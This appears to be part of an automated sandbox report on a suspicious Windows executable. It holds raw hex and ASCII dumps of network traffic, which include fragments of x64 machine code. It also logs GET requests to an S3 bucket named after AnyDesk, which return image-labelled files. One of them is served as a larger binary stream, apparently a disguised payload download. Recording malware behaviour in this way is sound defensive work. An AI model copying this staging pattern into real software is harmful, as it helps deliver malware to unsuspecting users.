                                                                                              2024-12-18 12:05:43 UTC16384INData Raw: ab 0b 00 48 89 45 a8 33 c9 48 89 08 48 89 48 08 48 89 48 10 40 88 7d b0 44 8b cf 4c 8b 45 a8 48 8b d3 48 8b ce e8 d9 99 01 00 48 8d 75 a0 eb 14 48 8b 12 48 8d 4d b8 e8 a3 92 ff ff 48 8b f0 bf 02 00 00 00 89 7d 38 49 8b d6 48 8d 4d d8 e8 3c e1 ff ff 48 8b d8 48 8d 55 d0 49 8b cf e8 cd e1 ff ff 90 4c 8b cb 4c 8d 45 e0 48 8b d6 48 8b 08 e8 0a 41 01 00 90 48 8b 4d d0 48 85 c9 74 07 48 8b 01 ff 50 08 90 48 8b 45 d8 48 85 c0 74 16 48 8b 48 08 48 63 51 04 48 8d 48 08 48 03 ca 48 8b 01 ff 50 08 90 40 f6 c7 02 74 31 83 e7 fd 4c 89 65 b8 48 8b 4d c0 48 85 c9 74 21 80 7d c8 00 74 13 e8 31 99 01 00 ba 18 00 00 00 48 8b 4d c0 e8 67 a9 0b 00 4c 89 6d c0 c6 45 c8 00 40 f6 c7 01 74 2e 4c 89 65 a0 48 8b 4d a8 48 85 c9 74 21 80 7d b0 00 74 13 e8 fd 98 01 00 ba 18 00 00 00
                                                                                              Data Ascii: HE3HHHHH@}DLEHHHuHHMH}8IHM<HHUILLEHHAHMHtHPHEHtHHHcQHHHHP@t1LeHMHt!}t1HMgLmE@t.LeHMHt!}t
                                                                                              2024-12-18 12:05:43 UTC1024INData Raw: 00 48 2b 37 ba 32 00 00 00 48 8b cf e8 1e 52 ff ff 48 8b 0f 48 3b 77 08 73 12 48 8d 14 31 41 b8 32 00 00 00 ff 15 bd d0 0d 00 eb 2b 0f 10 05 34 b7 1d 00 0f 11 01 0f 10 0d 3a b7 1d 00 0f 11 49 10 0f 10 05 3f b7 1d 00 0f 11 41 20 0f b7 05 44 b7 1d 00 66 89 41 30 48 8b 07 c6 40 32 00 48 c7 47 08 32 00 00 00 48 8d bb c0 01 00 00 48 89 6f 08 48 8d 47 18 48 89 07 4c 89 77 10 c6 00 00 48 8d 35 19 b7 1d 00 48 2b 37 ba 31 00 00 00 48 8b cf e8 99 51 ff ff 48 8b 0f 48 3b 77 08 73 12 48 8d 14 31 41 b8 31 00 00 00 ff 15 38 d0 0d 00 eb 2a 0f 10 05 e7 b6 1d 00 0f 11 01 0f 10 0d ed b6 1d 00 0f 11 49 10 0f 10 05 f2 b6 1d 00 0f 11 41 20 0f b6 05 f7 b6 1d 00 88 41 30 48 8b 07 c6 40 31 00 48 c7 47 08 31 00 00 00 48 8d bb e8 01 00 00 48 89 6f 08 48 8d 47 18 48 89 07 4c 89 77
                                                                                              Data Ascii: H+72HRHH;wsH1A2+4:I?A DfA0H@2HG2HHoHGHLwH5H+71HQHH;wsH1A18*IA A0H@1HG1HHoHGHLw
                                                                                              2024-12-18 12:05:43 UTC1749INData Raw: 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11
                                                                                              Data Ascii: 8HD$ HHtHBHcHHHHPH8H8HD$ HHtHBHcHHHHPH8H8HD$ HHtHBHcHHHHPH8H8HD$ HHtHBHcHHHHPH8H8HD$ HHtHBHcHHHHPH8H8HD$ H
                                                                                              2024-12-18 12:05:43 UTC16384INData Raw: 04 48 8b 4c 11 48 48 85 c9 74 07 48 8b 01 ff 50 10 90 48 83 c4 38 c3 cc cc cc 40 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 ff 15 d8 c4 0d 00 90 84 c0 75 0a 48 8b 0b ff 15 f2 c4 0d 00 90 48 8b 13 48 8b 02 48 63 48 04 48 8b 4c 11 48 48 85 c9 74 07 48 8b 01 ff 50 10 90 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc 40 57 48 83 ec 40 48 c7 44 24 20 fe ff ff ff 48 89 5c 24 50 48 89 74 24 58 48 8b f9 48 8b 02 48 89 44 24 28 4c 8b 42 08 33 c9 48 89 0a 48 89 4a 08 48 89 07 48 8b 4f 08 48 89 4c 24 30 4c 89 47 08 48 85 c9 74 33 83 ce ff 8b c6 f0 0f c1 41 08 83 f8 01 75 24 48 8b 5c 24 30 48 8b 03 48 8b cb ff 50 10 f0 0f c1 73 0c 83 fe 01 75 0c 48 8b 4c 24 30 48 8b 01 ff 50 18 90 48 8b c7 48 8b 5c 24 50 48 8b 74 24 58 48 83 c4 40 5f c3 cc cc cc cc 48 89 5c 24 18
                                                                                              Data Ascii: HLHHtHPH8@SH0HD$ HuHHHHcHHLHHtHPH0[@WH@HD$ H\$PHt$XHHHD$(LB3HHJHHOHL$0LGHt3Au$H\$0HHPsuHL$0HPHH\$PHt$XH@_H\$
                                                                                              2024-12-18 12:05:43 UTC1024INData Raw: 08 40 32 ff e9 d6 01 00 00 4c 89 74 24 20 48 8d 45 f8 48 89 44 24 28 c6 44 24 30 00 48 8b 0b 48 8b 01 48 8d 95 a8 00 00 00 ff 10 90 48 8b 08 48 8b 01 48 8d 54 24 38 ff 50 08 90 48 8b 85 a8 00 00 00 48 85 c0 74 16 48 8b 48 08 48 63 51 04 48 8d 48 08 48 03 ca 48 8b 01 ff 50 08 90 48 8b 44 24 28 48 8b 4c 24 40 48 85 c9 74 07 48 83 79 08 00 75 14 48 85 c0 0f 84 fa 00 00 00 48 83 78 08 00 0f 84 ef 00 00 00 48 85 c9 74 2e 48 83 79 08 00 74 27 48 85 c0 74 22 48 83 78 08 00 74 1b 48 8b d0 e8 93 0e 01 00 85 c0 75 0f 48 8b 44 24 28 48 8b 4c 24 40 e9 bc 00 00 00 48 8d 15 79 6f 1d 00 48 8d 4c 24 70 e8 3f 07 ff ff 90 c7 85 a8 00 00 00 01 00 00 00 48 8b 5c 24 78 48 8b 4c 24 40 48 85 c9 74 07 48 83 79 08 00 75 0c 48 85 db 74 2b 48 83 7b 08 00 74 24 48 85 c9 74 43 48 83
                                                                                              Data Ascii: @2Lt$ HEHD$(D$0HHHHHHT$8PHHtHHHcQHHHHPHD$(HL$@HtHyuHHxHt.Hyt'Ht"HxtHuHD$(HL$@HyoHL$p?H\$xHL$@HtHyuHt+H{t$HtCH
                                                                                              2024-12-18 12:05:43 UTC16384INData Raw: ff ff 48 3b c3 74 14 4c 8b 43 08 48 8b c8 48 8b 13 48 83 c4 20 5b e9 7f 01 ff ff 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc c2 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc c2 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc c2 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 49 8b d8 4c 8b 02 4d 85 c0 74 16 49 8b 40 08 48 63 48 04 49 83 c0 08 49 03 c8 48 8b 01 ff 50 08 90 48 8b 13 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 55 53 56 57 41 54 41 55 41 56 41 57 48 8d 6c 24 e1 48 81 ec f8 00 00 00 48 c7 45 af fe ff ff ff 48 8b 05 d8 ef 24 00 48 33 c4 48 89 45 0f 49 8b f1 4d 8b e8 4c 8b e2 4c 8b f9 48 89 55 b7 4c 89 45 bf 33 ff
                                                                                              Data Ascii: H;tLCHHH [H [@SH0HD$ ILMtI@HcHIIHPHHtHBHcHHHHPH0[@USVWATAUAVAWHl$HHEH$H3HEIMLLHULE3


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.5497143.5.237.314431472C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:05:49 UTC70OUTGET /view.png HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              2024-12-18 12:05:50 UTC436INHTTP/1.1 200 OK
                                                                                              x-amz-id-2: xRLddAZEV2GXRAKcvPPknUbNVzoggQGjbVO5254EdMYj9oRQpOWZFYyfbdW5bY3uQ8xLA66XnCiDrx3aVAig23jRoQuixdV9
                                                                                              x-amz-request-id: FQPA43K6P9CB0WEG
                                                                                              Date: Wed, 18 Dec 2024 12:05:51 GMT
                                                                                              Last-Modified: Thu, 12 Dec 2024 20:28:18 GMT
                                                                                              ETag: "1e17e3f8b9917ce02cdb53f289db96c9"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: image/png
                                                                                              Content-Length: 376421
                                                                                              Server: AmazonS3
                                                                                              Connection: close
                                                                                              2024-12-18 12:05:50 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 5d 00 00 01 86 08 02 00 00 00 ce f1 a3 0d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 11 74 45 58 74 53 6f 66 74 77 61 72 65 00 53 6e 69 70 61 73 74 65 5d 17 ce dd 00 00 20 00 49 44 41 54 78 9c ec bd 57 a2 24 3b 8e 25 08 d0 3d 7b cd b3 85 d9 62 ef a4 32 dc 70 e6 03 9a a4 89 2b e2 65 75 4f 31 5f de 30 37 a3 00 41 68 2a fe df ff ef ff 03 92 e3 23 44 20 22 62 26 22 26 ce 47 22 22 1e 63 10 31 40 96 8d a8 3e 33 33 b3 7e 25 22 10 6a 26 10 83 06 13 7b 65 4b 02 00 2f bc 4d 4c c4 cc 91 39 fe d6 87 8b 74 9b e3 35 06 33 8b 48 64 e6 02 18 20 06 06 5b 1f 14 98 02 12 69 16 f6 54 ca a2 94 5d 00 b3 0c 20 26 66 8a b2 db 9e e6 b3 0f 4c e4 1f 63 50 c5 4f 47 0e 00 c8 25 0e 98 06 8f ec f6 92
                                                                                              Data Ascii: PNGIHDR]pHYs%%IR$tEXtSoftwareSnipaste] IDATxW$;%={b2p+euO1_07Ah*#D "b&"&G""c1@>33~%"j&{eK/ML9t53Hd [iT] &fLcPOG%
                                                                                              2024-12-18 12:05:50 UTC588INData Raw: 1d 75 6a 36 9d 1f c0 11 91 47 72 d3 ca e0 b8 12 59 c4 c3 98 d5 d0 07 db 89 88 f1 c6 83 8b 76 f6 3a 5c 25 19 1a 5d 20 29 c0 cd 05 2f bc 12 02 be b2 63 9e c9 b0 0e 65 ed 5d 95 7a d3 10 2f 17 91 f5 b2 da a5 09 2c ab 69 70 b9 77 f7 96 e4 b2 27 b5 16 44 37 89 40 e8 d7 dc 86 58 3b 07 b0 35 1e b6 86 19 5c d0 37 37 a4 89 3d 99 00 00 20 00 49 44 41 54 96 d9 5d b4 60 e9 de ba 18 06 12 80 74 86 20 63 d0 ce 7b 02 3d 3f 91 99 f8 35 d4 91 50 82 32 7b 89 3d fc 03 f1 8b d5 1a c4 99 86 cd 35 18 f5 88 40 81 89 31 bf 1c df 2a 3e 67 93 1d 1e 92 6d 05 cc 0c 25 b2 7e 9d 23 b7 48 fb 68 67 47 22 f6 17 45 ac 87 cd de b9 74 43 27 3e e2 8d 67 27 50 af e5 d0 79 e4 6c 81 14 44 44 6f df 98 65 5c a7 88 d3 05 78 ae 74 94 40 a4 1a 65 93 dd 21 87 08 30 c6 50 9f 80 fb 5a c7 33 83 b5 e8 c8
                                                                                              Data Ascii: uj6GrYv:\%] )/ce]z/,ipw'D7@X;5\77= IDAT]`t c{=?5P2{=5@1*>gm%~#HhgG"EtC'>g'PylDDoe\xt@e!0PZ3
                                                                                              2024-12-18 12:05:50 UTC16384INData Raw: 60 56 76 63 d7 8e f3 f5 b1 33 9d e4 41 ca d1 d6 04 5e 0d d2 d4 6c f9 2b 21 6c 32 b6 c8 cf 5a 9c 9f de bf f8 a5 14 e8 be b8 96 ef 2b 29 ad c3 b3 54 97 e7 d0 33 6d 71 9b 94 0f 23 76 f1 93 aa 1e 24 3e ef e0 df 6e 9a b0 6c 1b f8 dd 24 82 7f ff fb df 2a cd 78 77 03 59 91 41 c9 ae 93 19 f1 24 99 36 72 23 e3 4b 7d f9 1b 1d ff 46 42 9f 7b 7e 10 ff f9 8b 90 23 7c e1 ff 64 fa 27 9a ff bb a3 1f f4 bc 48 eb 7f 86 ea 8a 45 f1 4f cd e5 f7 b4 f5 e6 6b 04 f8 92 ce 2f 64 e3 d3 e4 f2 ad e9 c5 22 22 e6 d6 df f5 da 5b f6 80 92 06 85 72 56 a5 da 7b fb 04 3f 23 99 44 38 da 13 31 43 d3 e2 5b 7b 83 22 b7 e6 d4 18 6c f1 23 cb 95 42 27 8d 97 28 ae 96 a5 c8 6f 16 47 f5 f7 29 f3 54 d1 ab 51 d3 ec 8c ba 2d 02 11 e8 b9 e5 e4 86 aa f5 a4 ac 10 bb 66 5e d8 d9 b0 de 1a d8 ab d3 07 88 c5
                                                                                              Data Ascii: `Vvc3A^l+!l2Z+)T3mq#v$>nl$*xwYA$6r#K}FB{~#|d'HEOk/d""[rV{?#D81C[{"l#B'(oG)TQ-f^
                                                                                              2024-12-18 12:05:50 UTC1024INData Raw: 71 0a 82 19 3f 2d 8b 47 12 8b 4e 1c 23 07 3f 58 0d ea 7e 8e ae 83 94 ef a0 a2 e4 ef 70 51 87 df 0f c5 d6 60 dc 3c ab 53 fb c4 79 b6 28 d4 37 26 a4 2a 81 d7 09 89 d1 0e c8 da ca 02 5d 66 7b ed b5 f7 e6 16 72 71 db fe 7e d0 12 68 e4 9e 15 9d 2a ff 9a 63 b8 b3 44 15 ad 92 99 04 0e 45 17 bc ec e4 a1 d7 64 5b ef 28 50 2e b9 ec 0e e5 b4 7d b2 bd 24 bd ef 90 73 ae b5 b7 31 54 3c 5e 5c 5a dd 57 00 aa 32 74 a8 ea f6 a8 ff ea 7c 6e d5 b8 20 7f fc 44 a1 dc 19 9d 0f 30 b4 88 28 a2 22 37 36 fb 5e 1e 5b 94 18 35 5c 91 64 cd 91 3a 54 d5 10 ba 9b cb 5f 11 95 55 25 48 c2 db 1c f0 e9 d4 8a 38 23 d9 43 21 8b fe 0d 50 e3 24 45 19 95 de ab 6e 9f 3b 41 54 85 14 af f4 67 09 1b 67 90 82 a2 43 b2 d3 5f 5f 71 df bf 0f 66 72 f1 cf ef e8 e4 fc b5 6d 6a 6f 79 ca 77 a4 f5 b8 19 63 0d
                                                                                              Data Ascii: q?-GN#?X~pQ`<Sy(7&*]f{rq~h*cDEd[(P.}$s1T<^\ZW2t|n D0("76^[5\d:T_U%H8#C!P$En;ATggC__qfrmjoywc
                                                                                              2024-12-18 12:05:50 UTC16384INData Raw: 11 d3 d4 23 23 34 4a b8 41 24 2e 4e 51 e7 a1 ee c2 f5 0f ee 90 14 c8 1c fa 67 0e 97 32 ca 48 8e 80 4f a8 50 a7 3e 02 12 5d 15 73 e8 19 a2 13 07 17 f1 b1 01 1f 7c a3 64 53 49 fb f6 a4 28 b4 e7 68 c5 6c 67 29 87 c3 be 72 dd 8b 3c 4d 40 55 9d b2 11 62 4e b2 1e 10 d8 24 68 1e b4 18 12 7a 96 4d 2b 78 db c6 6d 7b c3 0d 7e b6 f3 98 a6 65 db 09 64 db 7e af 37 33 51 b8 e1 62 bc f1 0e 32 7b aa 52 7d 33 fe 47 5c a5 a6 f1 b1 97 2f 5c fc fc 0e cb 40 00 a4 b2 25 02 3d d6 f9 10 26 e1 92 d9 11 34 d0 c0 13 80 60 be dc 21 77 d6 b5 09 19 df 8f 44 7a 2c 86 7a 56 b9 84 4e e8 f4 3a 74 88 aa 0a 44 d4 74 f3 80 76 fa bd e3 78 01 42 f4 61 a7 ba 71 11 9d 0f 7c 87 8b a7 c4 4f c3 92 f6 dd bf b3 c8 3e c3 9f 9f ff f9 72 92 2c 3a 3e 9d 39 63 7b f6 30 d9 d9 5f ae 58 17 9e cf f8 d8 7e bf
                                                                                              Data Ascii: ##4JA$.NQg2HOP>]s|dSI(hlg)r<M@UbN$hzM+xm{~ed~73Qb2{R}3G\/\@%=&4`!wDz,zVN:tDtvxBaq|O>r,:>9c{0_X~
                                                                                              2024-12-18 12:05:50 UTC1024INData Raw: 1a b2 96 ed 1a 7d 00 db 99 cf ed 5f 3c 59 99 b8 2d dc 02 32 55 7d 7a d5 4d 4b 2f 7e 29 b9 a4 7c 7c 59 bb a3 f0 ec 93 10 d9 09 d4 ac e6 2b 44 05 ff 17 9e 18 01 70 4c 66 cb 6a 9c 84 fd 5c e2 48 48 e2 61 3a 5f 85 d5 14 13 61 ff d4 e1 88 43 3b 06 1e 03 3a 28 22 bf 44 dc 4c 1c e3 1f 5d 89 a1 1a cc 78 d9 e1 07 27 92 4e ff 24 87 e0 eb 4b 3c 97 43 88 5f 2e 28 e8 42 ed af c7 20 31 58 a6 d6 cc 7f 99 b3 e7 b3 7f 9e e7 49 9b 53 33 40 09 01 28 91 81 da db cc af 85 ce a9 fa 0d 1e 40 da 77 11 aa c4 90 8a 10 96 95 d1 fd 7e 17 0a 19 dc 1c 16 6c dc f9 72 66 fa a8 fa 86 d1 46 9c c0 77 6f 55 00 0a 88 9a 19 28 46 e1 21 f8 12 1e 03 c7 80 87 75 63 b6 3c 06 2f f6 99 4d 4d 14 54 a5 e7 85 7e 0a 0f ab 69 5f c0 53 b8 88 48 d5 ce 26 0b 15 95 93 b4 5f bf 1e 32 78 64 38 9b 63 f8 61 cb
                                                                                              Data Ascii: }_<Y-2U}zMK/~)||Y+DpLfj\HHa:_aC;:("DL]x'N$K<C_.(B 1XIS3@(@w~lrfFwoU(F!uc</MMT~i_SH&_2xd8ca
                                                                                              2024-12-18 12:05:50 UTC1749INData Raw: 86 e6 cc f8 6e d4 65 a2 2c ff 34 36 1f aa 8b c0 5a 8e 81 00 3c 4f d8 8e 8b 1b 34 5d d1 87 d9 68 b3 1c b7 fb d0 87 54 6c 97 6f ff e9 65 bf 5d 62 21 62 e0 e2 79 9e 73 9e e7 b9 70 51 95 53 dc 85 d6 a3 d4 8b 8d 6c 3b 1e 82 48 e8 93 c4 50 f3 cb 24 fb 5a 50 35 e8 92 4f 80 5c 65 fe 49 66 5c 02 d2 fb 23 7c 11 d7 9b c8 ba 8d 62 b0 63 3c 52 d9 75 6b 3c f4 a1 e7 3c ce af 63 9e 53 64 1c bf 7e f9 27 ae 66 3d 46 ec 52 85 5c 62 db 4a 4c a9 6d fd 7f e1 62 fa 4a 34 59 d3 84 f4 0c 85 0d 11 d1 b4 45 70 38 f7 a7 40 06 e5 90 91 ba 66 08 71 c2 cd dc d2 27 ce ad 64 67 fa a9 7a e9 8e 8b 79 4e 66 f1 6a f7 57 08 55 5c 4f b7 29 16 cf 5e 36 12 4b 0c 6a 95 0e b3 b3 76 d4 02 17 d5 74 00 f6 78 c8 63 8c 41 19 f0 64 54 a3 70 d1 87 6a 64 38 82 38 bd 1d 5e 2f 91 e9 e5 f9 1c ff fe 1e ab de
                                                                                              Data Ascii: ne,46Z<O4]hTloe]b!byspQSl;HP$ZP5O\eIf\#|bc<Ruk<<cSd~'f=FR\bJLmbJ4YEp8@fq'dgzyNfjWU\O)^6KjvtxcAdTpjd88^/
                                                                                              2024-12-18 12:05:50 UTC9000INData Raw: b5 e2 0c 09 4c 99 20 5a e2 72 4d 53 83 a9 4d 77 09 5c 74 85 6b 85 25 f0 79 b6 23 77 63 83 32 9a 50 58 12 8a a8 0c 85 12 b3 a0 c5 cc 8c a6 ac 05 e0 d0 3f 68 c2 49 78 c0 2c 0b f4 2f d9 96 5b b1 79 9d 65 f9 b0 6c 02 63 d7 63 7b 97 c9 64 ad b4 b3 a2 0d a6 fd a5 be 21 0a e3 b3 cd c0 8a f8 93 a4 65 30 62 4e 25 74 62 46 d2 2e 13 01 8e 88 7b 1f fe 5c 19 68 37 1c 58 34 73 81 d1 7a 30 7c a4 90 66 bd 71 2a 01 d8 a1 7f cf d8 3c 1e e3 f8 f5 35 8e 21 6a 60 1a 66 9d 9f 34 d7 25 0f 6b 60 ee c9 4f 51 3f 7b b1 d0 3d e3 aa ef 52 6b d2 ab 71 50 4a 5f 4c 7d 32 e3 6f a4 81 76 08 06 cd cf 5c 59 4c 9c ba 4b 93 e9 8c e1 cb 51 4f 99 c5 00 0c 91 14 67 98 51 d2 82 79 38 aa 9c 16 a1 0a 35 87 a7 96 a3 e6 6e ad 33 12 cb bf 9e 11 ce 2a e4 56 90 aa 34 d3 e9 87 25 c2 ff d6 73 71 d8 f7 19
                                                                                              Data Ascii: L ZrMSMw\tk%y#wc2PX?hIx,/[yelcc{d!e0bN%tbF.{\h7X4sz0|fq*<5!j`f4%k`OQ?{=RkqPJ_L}2ov\YLKQOgQy85n3*V4%sq
                                                                                              2024-12-18 12:05:51 UTC16384INData Raw: 60 01 8c 41 d9 02 a6 d4 1e db f6 2b d6 39 4d 92 6b 75 b8 95 07 af d6 51 ae 73 9a d9 34 23 26 36 6e e0 aa 9c 2a ce fe b9 b8 8e e0 c1 31 4d 11 d9 94 ac ed fd b5 89 8e a3 87 56 2c 35 5a 4a 0b e3 81 79 90 18 34 cd 24 9a 18 3f e7 4a 5d 5a 16 55 c7 99 16 d2 21 31 29 f5 c2 3c fc e7 1b 8b 93 c1 f2 65 0c 98 eb df 53 a7 e9 39 a7 9e a7 ce 79 3c 06 48 8e 75 c5 4e 9d c8 31 86 1f 2f 0f 5e bb 2d 25 00 38 3c 74 1a a0 3a 6b 1e 7d f9 38 e4 44 38 9d 57 f8 8e 85 8b 70 db c0 75 fa 5b 54 af 18 1c f5 4e 79 20 05 c2 e0 04 8c 86 8b b1 75 5a 76 04 a3 45 40 4b 96 20 e3 ee ad be c8 cc 4f 4d 2b 84 94 11 c7 e7 d4 4c 75 5a 4b 72 4c 52 8d f5 93 c1 f6 bb 4a 6d 06 a4 11 75 0d d3 1d 17 37 51 62 1b d5 cb f3 1b eb 29 ca 9e d9 a6 b2 c4 16 dd b7 e1 7e 09 30 04 3c 58 a2 53 70 da 1f 2e 2f b1 67
                                                                                              Data Ascii: `A+9MkuQs4#&6n*1MV,5ZJy4$?J]ZU!1)<eS9y<HuN1/^-%8<t:k}8D8Wpu[TNy uZvE@K OM+LuZKrLRJmu7Qb)~0<XSp./g
                                                                                              2024-12-18 12:05:51 UTC1024INData Raw: 1e 0d cd b0 b1 a7 6d a1 c5 15 42 75 7f 6c 3e 3b 01 68 ef 81 c8 68 61 52 26 30 d9 09 d4 6d cb 59 0f 2a a6 fb 6d bb e2 71 c2 5a 7a b2 b7 7a 09 6f f4 da cd 98 47 61 c1 e3 18 b3 3a d6 1e 1c c8 aa 35 a9 85 32 13 81 ca 90 50 35 37 88 84 e9 9e cc 9c f3 f1 85 1b 50 05 37 ee ee a4 14 1d 87 84 d6 d0 25 d7 99 cb 31 45 2a ac 60 af e8 1a b3 da cc 7b 59 de 17 3d 4b d6 c8 aa 49 2e 70 d9 96 2a 8f 61 e3 49 6d dc 7b 79 ff da 95 14 4e 9e ee d2 e2 ac fa d6 f7 c4 7c 10 49 8f f5 b9 a9 b5 7a 24 6f af 6c c0 c6 cd 7e 7a 6f 16 ec 6b e7 33 3a c2 42 27 55 18 df 2e dc 83 ea ca de d1 fc 3c 6f fc c3 06 d8 76 df 24 c3 cc 7e b3 dd 2f 6f 5b 77 e2 a8 56 b4 21 20 9f d3 10 15 c7 85 51 f8 94 6b 30 12 07 63 8d 77 ec cb 71 9b 8a e1 70 02 9c a6 ef 7a 69 63 0b 02 10 8a 02 b9 c5 45 88 ed 60 9d 69
                                                                                              Data Ascii: mBul>;hhaR&0mY*mqZzzoGa:52P57P7%1E*`{Y=KI.p*aIm{yN|Iz$ol~zok3:B'U.<ov$~/o[wV! Qk0cwqpzicE`i


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.5497153.5.238.1834431472C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:05:53 UTC69OUTGET /aut.png HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              2024-12-18 12:05:54 UTC446INHTTP/1.1 200 OK
                                                                                              x-amz-id-2: nHTfFCDebI1862kJlPX+EJdcbgbw669Hft7bRRxVMzCWJFQ3N+32OfShzoDS62cICk2+TDha+E12LZB8YsaHHX71sfFLdj8O
                                                                                              x-amz-request-id: NX351FFWV52Y3C2P
                                                                                              Date: Wed, 18 Dec 2024 12:05:55 GMT
                                                                                              Last-Modified: Fri, 13 Dec 2024 18:14:05 GMT
                                                                                              ETag: "0ca6a22e9feadb18c76712b5b0256b96"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 660160
                                                                                              Server: AmazonS3
                                                                                              Connection: close
                                                                                              2024-12-18 12:05:54 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 5d 00 00 01 86 08 02 00 00 00 ce f1 a3 0d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 11 74 45 58 74 53 6f 66 74 77 61 72 65 00 53 6e 69 70 61 73 74 65 5d 17 ce dd 00 00 20 00 49 44 41 54 78 9c ec bd 57 a2 24 3b 8e 25 08 d0 3d 7b cd b3 85 d9 62 ef a4 32 dc 70 e6 03 9a a4 89 2b e2 65 75 4f 31 5f de 30 37 a3 00 41 68 2a fe df ff ef ff 03 92 e3 23 44 20 22 62 26 22 26 ce 47 22 22 1e 63 10 31 40 96 8d a8 3e 33 33 b3 7e 25 22 10 6a 26 10 83 06 13 7b 65 4b 02 00 2f bc 4d 4c c4 cc 91 39 fe d6 87 8b 74 9b e3 35 06 33 8b 48 64 e6 02 18 20 06 06 5b 1f 14 98 02 12 69 16 f6 54 ca a2 94 5d 00 b3 0c 20 26 66 8a b2 db 9e e6 b3 0f 4c e4 1f 63 50 c5 4f 47 0e 00 c8 25 0e 98 06 8f ec f6 92
                                                                                              Data Ascii: PNGIHDR]pHYs%%IR$tEXtSoftwareSnipaste] IDATxW$;%={b2p+euO1_07Ah*#D "b&"&G""c1@>33~%"j&{eK/ML9t53Hd [iT] &fLcPOG%
                                                                                              2024-12-18 12:05:54 UTC578INData Raw: 1d 75 6a 36 9d 1f c0 11 91 47 72 d3 ca e0 b8 12 59 c4 c3 98 d5 d0 07 db 89 88 f1 c6 83 8b 76 f6 3a 5c 25 19 1a 5d 20 29 c0 cd 05 2f bc 12 02 be b2 63 9e c9 b0 0e 65 ed 5d 95 7a d3 10 2f 17 91 f5 b2 da a5 09 2c ab 69 70 b9 77 f7 96 e4 b2 27 b5 16 44 37 89 40 e8 d7 dc 86 58 3b 07 b0 35 1e b6 86 19 5c d0 37 37 a4 89 3d 99 00 00 20 00 49 44 41 54 96 d9 5d b4 60 e9 de ba 18 06 12 80 74 86 20 63 d0 ce 7b 02 3d 3f 91 99 f8 35 d4 91 50 82 32 7b 89 3d fc 03 f1 8b d5 1a c4 99 86 cd 35 18 f5 88 40 81 89 31 bf 1c df 2a 3e 67 93 1d 1e 92 6d 05 cc 0c 25 b2 7e 9d 23 b7 48 fb 68 67 47 22 f6 17 45 ac 87 cd de b9 74 43 27 3e e2 8d 67 27 50 af e5 d0 79 e4 6c 81 14 44 44 6f df 98 65 5c a7 88 d3 05 78 ae 74 94 40 a4 1a 65 93 dd 21 87 08 30 c6 50 9f 80 fb 5a c7 33 83 b5 e8 c8
                                                                                              Data Ascii: uj6GrYv:\%] )/ce]z/,ipw'D7@X;5\77= IDAT]`t c{=?5P2{=5@1*>gm%~#HhgG"EtC'>g'PylDDoe\xt@e!0PZ3
